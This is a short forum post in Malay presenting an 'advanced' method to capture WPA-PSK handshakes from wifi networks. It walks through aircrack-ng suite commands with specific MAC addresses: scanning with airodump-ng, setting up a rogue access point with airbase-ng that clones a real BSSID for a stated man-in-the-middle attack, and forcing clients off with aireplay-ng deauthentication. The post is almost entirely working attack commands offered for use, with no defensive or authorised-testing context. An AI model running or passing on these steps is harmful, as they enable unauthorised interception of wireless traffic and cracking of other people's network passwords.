Tab

Tab2

Advance capture WPA-PSK Handshake



Saya akan tunjukkan cara anyg lebih cepat dan guarantee dapat capture WPA handsake..
Pernah berlaku berdasarkan pengalaman lebih dari 2 kali di mana tidak dapat caputre wpa-handsake dengan cara deauth biasa,, mugkin disebab kan line yang tidak kuat, atau client yang passive..

so di bawah ni adalah cara-caranya


===================================================================
airodump-ng -f 100 --showack -h --berlin 10 -a mon0
--berlin 10 = masa 10 saat untuk display AP jika AP offline/no detect
--showack = show ack/cts/rts statistics
-h              = Hides known stations for --showack
-a              = filter client yang xconnect mane2 router
mon0        = wifi device

===================================================================
airodump-ng -c 1 --bssid 84:C9:B2:BE:99:7E -w capture -a mon0
-w        = write capture file
--bssid = mac adress AP
-c         = channel AP
-a         = filter client yang xconnect mane2 router
mon0   = wifi device

===================================================================
airbase-ng --bssid 84:C9:B2:BE:99:7E -a 84:C9:B2:BE:99:7E -h 00:06:25:02:FF:D8 -c 1 -e theatre -Z 4 -W 1 -v mon0
*** Membina fake AP di mana client akan connect fake AP dahulu ***
senang untuk capture WPA-handshake
--bssid = AP bssid
-a        = buat fake AP punya bssid
-h        = Mac kite untuk Man in the middle attack
-c        = channel AP
-e        = nama AP
-Z       = for WPA
-W      = dont set wep flag beacon
-v        = verbose (print more massege)

===================================================================
aireplay-ng --deauth 6 -a 84:C9:B2:BE:99:7E -c 00:30:0A:F9:AE:07 mon0
Paksa client disconnect dengan aireplay

Contoh Screenshoot
Posted Image
 -